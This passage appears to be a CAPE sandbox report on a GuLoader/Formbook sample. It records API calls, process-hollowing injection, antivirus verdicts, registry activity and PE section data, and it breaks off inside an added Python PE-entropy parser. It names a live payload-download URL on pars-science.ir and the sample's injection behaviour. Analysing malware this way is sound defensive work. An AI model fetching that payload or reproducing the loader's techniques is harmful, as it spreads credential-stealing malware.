DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx
DynamicLoader: cryptbase.dll/SystemFunction036
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventWrite
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/StringFromIID
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoSetProxyBlanket
DynamicLoader: ole32.dll/ObjectStublessClient10
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegEnumKeyExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
HTTPS urls from behavior.
URL: http://pars-science.ir/colinx_hYnafiCIIe228.bin
CAPE extracted potentially suspicious content
c6Dqqn8fjGAx.exe: Injected PE Image: 32-bit executable
c6Dqqn8fjGAx.exe: Injected Shellcode/Data
c6Dqqn8fjGAx.exe: GuLoader
c6Dqqn8fjGAx.exe: Injected PE Image: 32-bit DLL
c6Dqqn8fjGAx.exe: Unpacked Shellcode
c6Dqqn8fjGAx.exe: Unpacked Shellcode
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
Performs some HTTP requests
url: http://pars-science.ir/colinx_hYnafiCIIe228.bin
Unconventional language used in binary resources: Catalan
Authenticode signature is invalid
authenticode error: No signature found. SignTool Error File not valid C\Users\Rebecca\AppData\Local\Temp\c6Dqqn8fjGAx
Behavioural detection: Injection (Process Hollowing)
Injection: c6Dqqn8fjGAx.exe(5596) -> c6Dqqn8fjGAx.exe(5848)
Executed a process and injected code into it, probably while unpacking
Injection: c6Dqqn8fjGAx.exe(5596) -> c6Dqqn8fjGAx.exe(5848)
Behavioural detection: Injection (inter-process)
CAPE detected the Formbook malware family
File has been identified by 21 Antiviruses on VirusTotal as malicious
Cylance: Unsafe
Sangfor: Malware
F-Prot: W32/VBKrypt.AMM.gen!Eldorado
Symantec: ML.Attribute.HighConfidence
APEX: Malicious
Kaspersky: Trojan.Win32.Vebzenpak.vsy
Trapmine: malicious.high.ml.score
SentinelOne: DFI - Suspicious PE
Cyren: W32/VBKrypt.AMM.gen!Eldorado
Fortinet: W32/Agent.HKMB!tr
Endgame: malicious (high confidence)
Microsoft: PWS:Win32/Fareit.AB!MTB
ZoneAlarm: Trojan.Win32.Vebzenpak.vsy
McAfee: Fareit-FST!5484FDF0FB3F
Malwarebytes: Trojan.MalPack.VB
ESET-NOD32: a variant of Win32/Injector.EMGX
Rising: Downloader.Guloader!1.C738 (CLASSIC)
Ikarus: Win32.SuspectCrc
eGambit: Unsafe.AI_Score_99%
BitDefenderTheta: Gen:[email protected]
Qihoo-360: Generic/HEUR/QVM03.0.B1EC.Malware.Gen
Attempts to modify proxy settings
Created network traffic indicative of malicious activity
signature: ET JA3 Hash - Possible Malware - Various Malspam/RigEK

Hosts

Direct IP Country Name
N 185.159.153.117 Iran, Islamic Republic of
Y 1.1.1.1 Australia

DNS

Name Response Post-Analysis Lookup
pars-science.ir A 185.159.153.117 185.159.153.117

Summary

C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
C:\Users\Rebecca\AppData\Local\Temp\c6Dqqn8fjGAx.exe.cfg
C:\Windows\System32\C_932.NLS
C:\Windows\System32\C_949.NLS
C:\Windows\System32\C_950.NLS
C:\Windows\System32\C_936.NLS
C:\Users\Rebecca\AppData\Local\Temp\~DFF51EEFB66773FEBB.TMP
C:\Program Files\Qemu-ga\qemu-ga.exe
C:\Program Files\qga\qga.exe
C:\Windows\System32\msvbvm60.dll
C:\Windows\System32\ntdll.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
C:\Users\Rebecca\AppData\Local\Temp\~DFF51EEFB66773FEBB.TMP
C:\Program Files\Qemu-ga\qemu-ga.exe
C:\Program Files\qga\qga.exe
C:\Windows\System32\msvbvm60.dll
C:\Windows\System32\ntdll.dll
C:\Users\Rebecca\AppData\Local\Temp\~DFF51EEFB66773FEBB.TMP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Codepage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT\UserEra
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Policies\Microsoft\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\startbogstavs\Caponized9
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Tuberculomas\Coatninger
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CURRENT_USER\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadNetworkName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadNetworkName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
kernel32.dll.IsProcessorFeaturePresent
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
cryptbase.dll.SystemFunction036
oleaut32.dll.OleLoadPictureEx
oleaut32.dll.DispCallFunc
oleaut32.dll.LoadTypeLibEx
oleaut32.dll.UnRegisterTypeLib
oleaut32.dll.CreateTypeLib2
oleaut32.dll.VarDateFromUdate
oleaut32.dll.VarUdateFromDate
oleaut32.dll.GetAltMonthNames
oleaut32.dll.VarNumFromParseNum
oleaut32.dll.VarParseNumFromStr
oleaut32.dll.VarDecFromR4
oleaut32.dll.VarDecFromR8
oleaut32.dll.VarDecFromDate
oleaut32.dll.VarDecFromI4
oleaut32.dll.VarDecFromCy
oleaut32.dll.VarR4FromDec
oleaut32.dll.GetRecordInfoFromTypeInfo
oleaut32.dll.GetRecordInfoFromGuids
oleaut32.dll.SafeArrayGetRecordInfo
oleaut32.dll.SafeArraySetRecordInfo
oleaut32.dll.SafeArrayGetIID
oleaut32.dll.SafeArraySetIID
oleaut32.dll.SafeArrayCopyData
oleaut32.dll.SafeArrayAllocDescriptorEx
oleaut32.dll.SafeArrayCreateEx
oleaut32.dll.VarFormat
oleaut32.dll.VarFormatDateTime
oleaut32.dll.VarFormatNumber
oleaut32.dll.VarFormatPercent
oleaut32.dll.VarFormatCurrency
oleaut32.dll.VarWeekdayName
oleaut32.dll.VarMonthName
oleaut32.dll.VarAdd
oleaut32.dll.VarAnd
oleaut32.dll.VarCat
oleaut32.dll.VarDiv
oleaut32.dll.VarEqv
oleaut32.dll.VarIdiv
oleaut32.dll.VarImp
oleaut32.dll.VarMod
oleaut32.dll.VarMul
oleaut32.dll.VarOr
oleaut32.dll.VarPow
oleaut32.dll.VarSub
oleaut32.dll.VarXor
oleaut32.dll.VarAbs
oleaut32.dll.VarFix
oleaut32.dll.VarInt
oleaut32.dll.VarNeg
oleaut32.dll.VarNot
oleaut32.dll.VarRound
oleaut32.dll.VarCmp
oleaut32.dll.VarDecAdd
oleaut32.dll.VarDecCmp
oleaut32.dll.VarBstrCat
oleaut32.dll.VarCyMulI4
oleaut32.dll.VarBstrCmp
ole32.dll.CoCreateInstanceEx
ole32.dll.CLSIDFromProgIDEx
sxs.dll.SxsOleAut32MapIIDOrCLSIDToTypeLibrary
user32.dll.GetSystemMetrics
user32.dll.MonitorFromWindow
user32.dll.MonitorFromRect
user32.dll.MonitorFromPoint
user32.dll.EnumDisplayMonitors
user32.dll.GetMonitorInfoA
asycfilt.dll.FilterCreateInstance
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.NlsGetCacheUpdateCount
version.dll.VerQueryValueA
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
kernel32.dll.GetCalendarInfoW
ws2_32.dll.#23
ws2_32.dll.#21
ws2_32.dll.WSAIoctl
ws2_32.dll.#3
ws2_32.dll.#116
iphlpapi.dll.NotifyIpInterfaceChange
iphlpapi.dll.NotifyUnicastIpAddressChange
api-ms-win-downlevel-ole32-l1-1-0.dll.CoInitializeEx
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventWrite
api-ms-win-downlevel-ole32-l1-1-0.dll.CoCreateInstance
iphlpapi.dll.GetAdaptersAddresses
ws2_32.dll.GetAddrInfoW
oleaut32.dll.#8
oleaut32.dll.#9
oleaut32.dll.DllGetClassObject
oleaut32.dll.DllCanUnloadNow
advapi32.dll.RegOpenKeyW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
api-ms-win-downlevel-ole32-l1-1-0.dll.StringFromIID
api-ms-win-downlevel-ole32-l1-1-0.dll.CoUninitialize
oleaut32.dll.#500
ws2_32.dll.#5
api-ms-win-downlevel-ole32-l1-1-0.dll.CoSetProxyBlanket
ole32.dll.ObjectStublessClient10
oleaut32.dll.#2
ole32.dll.CoTaskMemFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegEnumKeyExW
oleaut32.dll.#6
api-ms-win-downlevel-advapi32-l1-1-0.dll.UnregisterTraceGuids
cryptsp.dll.CryptReleaseContext
"C:\Users\Rebecca\AppData\Local\Temp\c6Dqqn8fjGAx.exe"

BinGraph

PE Information

Image Base: 0x00400000
Entry Point: 0x004014c8
Reported Checksum: 0x000195b1
Actual Checksum: 0x000195b1
Minimum OS Version: 4.0
Compile Time: 2016-04-21 00:38:38
Import Hash: 3c02d8e5dd5f628bf90e285220bc8028
Icon Exact Hash: 7bcfdfd048785434cec7bf7208eb23a9
Icon Similarity Hash: 48ba5c06919089aab0a04972471cfee1

Sections

Name RAW Address Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00001000 0x0000f070 0x00010000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.76
.data 0x00011000 0x00011000 0x00000e8c 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rsrc 0x00012000 0x00012000 0x000015a8 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 3.11
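
The PE Information and Sections tables above (reported vs actual checksum, entry point, compile time, per-section entropy) are the first fields worth re-deriving from the file rather than trusting from a report, since a packed VB6 crypter like this one is recognised mostly by its section entropy and a code section whose raw size is padded well past its virtual size. The Python below is an added example, not code from the CAPE report or from the sample: it recomputes those fields from raw bytes with the standard library only. The two-section PE it builds is constructed for the example (the 2016-04-21 00:38:38 compile stamp and the all-zero .data section mirror the table; everything else is invented), and the 7.0 entropy threshold behind packed_code is this example's own rule of thumb, not a CAPE heuristic.

```python
"""Added example, not part of the CAPE report: recompute the fields behind the
PE Information and Sections tables (checksum, entry point, compile time, section
entropy) from raw bytes with the standard library. The PE built here is synthetic."""
import datetime
import math
import struct
from collections import Counter

IMAGE_SCN_MEM_EXECUTE = 0x20000000
PACKED_ENTROPY = 7.0  # example's own threshold for "looks compressed/encrypted"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_checksum(data: bytes) -> int:
    """IMAGE_OPTIONAL_HEADER.CheckSum as imagehlp's CheckSumMappedFile computes it:
    ones'-complement sum of 32-bit words (CheckSum field skipped), folded to 16 bits,
    plus the file length. It is not enforced for ordinary user-mode executables."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    checksum_off = (e_lfanew + 24 + 64) & ~3       # optional header + 64
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:                         # end-around carry
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data: bytes) -> dict:
    """Parse the DOS, COFF and optional headers and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections, timestamp = struct.unpack_from("<HI", data, e_lfanew + 6)
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unknown optional header magic {magic:#x}")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = (struct.unpack_from("<I", data, opt + 28) if magic == 0x10B   # PE32
                  else struct.unpack_from("<Q", data, opt + 24))[0]            # PE32+
    reported = struct.unpack_from("<I", data, opt + 64)[0]
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        entropy = shannon_entropy(data[rawptr:rawptr + rawsize])
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": vaddr, "virtual_size": vsize, "raw_size": rawsize,
            "characteristics": chars, "entropy": round(entropy, 2),
            # near-uniform bytes in an executable section is the usual crypter tell
            "packed_code": bool(chars & IMAGE_SCN_MEM_EXECUTE) and entropy > PACKED_ENTROPY,
        })
    return {"image_base": image_base, "entry_point": image_base + entry_rva,
            "compile_time": datetime.datetime.fromtimestamp(timestamp, datetime.timezone.utc),
            "reported_checksum": reported, "actual_checksum": pe_checksum(data),
            "sections": sections}


def build_sample_pe() -> bytes:
    """Constructed two-section PE32: .text holds every byte value twice (entropy 8.0),
    .data is all zero (entropy 0.0, like the report's .data section)."""
    e_lfanew, file_align, sect_align = 0x40, 0x200, 0x1000
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)
    # i386, 2 sections, TimeDateStamp 2016-04-21 00:38:38 UTC, 224-byte optional header
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 1461199118, 0, 0, 224, 0x102)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 6, 0, 0x200, 0x200, 0,           # PE32, linker 6.0, code/data/bss sizes
                      0x1000, 0x1000, 0x2000, 0x400000,       # entry RVA, BaseOfCode, BaseOfData, ImageBase
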